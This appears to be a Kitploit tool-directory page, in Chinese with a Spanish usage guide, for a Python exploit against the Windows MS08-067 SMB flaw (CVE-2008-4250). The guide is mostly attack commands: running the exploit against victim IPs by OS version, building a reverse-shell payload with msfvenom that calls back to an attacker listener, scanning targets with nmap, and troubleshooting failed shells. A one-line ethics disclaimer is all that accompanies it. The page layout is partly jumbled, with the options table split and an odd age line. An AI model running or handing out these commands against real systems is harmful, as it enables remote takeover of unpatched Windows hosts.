Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploit_MS08-067 — MS08-067 | CVE-2008-4250 | Kitploit
工具/GitHubGitHub/notrustedx/exploit_ms08-067
Payload生成漏洞分析漏洞利用Shellcode渗透测试远程访问工具
GitHubnotrustedx/exploit_ms08-067

Exploit_MS08-067

MS08-067 | CVE-2008-4250

查看仓库
121年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Guía Completa de Uso: # Exploit MS08-067 Mejorado

📌 Uso Básico

root@kitploit:~
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]

🎯 Ejemplos Prácticos

1. Windows XP SP0/SP1 (Puerto Default 445)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.100 1

2. Windows 2003 SP1 English (Puerto 139)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139

3. Con Shellcode Personalizado

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin

🔍 Parámetros Obligatorios

参数描述有效值
IP_VÍCTIMA目标IP任意IPv4
VERSIÓN_OS易受攻击的操作系统版本1-7(参见表格)

📋 Tabla de Versiones SOPORTADAS

值操作系统架构
1Windows XP SP0/SP1 通用版x86
2Windows 2000 通用版x86
.........

⚙️ Opciones Adicionales

选项描述默认值
-p/--portSMB端口(445/139)445
-t/--timeout

🛠️ Generación de Shellcode con msfvenom

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows

🔎 Identificación del Objetivo

root@kitploit:~
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>

🚨 Solución de Problemas Comunes

Error: STATUS_OBJECT_NAME_NOT_FOUND

  1. 检查Browser服务是否运行:

    root@kitploit:~
    nmap -p 445 --script smb-enum-shares <IP>
    
  2. 尝试其他管道(修改脚本):

    root@kitploit:~
    # Cambiar \\pipe\\browser por \\pipe\\srvsvc
    

Shellcode no ejecuta

  • 检查禁止字符:\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
  • 使用以下命令验证:
    root@kitploit:~
     msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
    

💡 Recomendaciones Éticas

✅ 仅在授权环境中使用
❌ 未经许可不得在生产线系统使用

📊 Salida Exitosa Esperada

root@kitploit:~
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!

⚠️ Nota: Este exploit no funciona en sistemas parcheados con el boletín MS08-067.

下载工具
超时时间(秒)
5
-s/--shellcode自定义shellcode路径None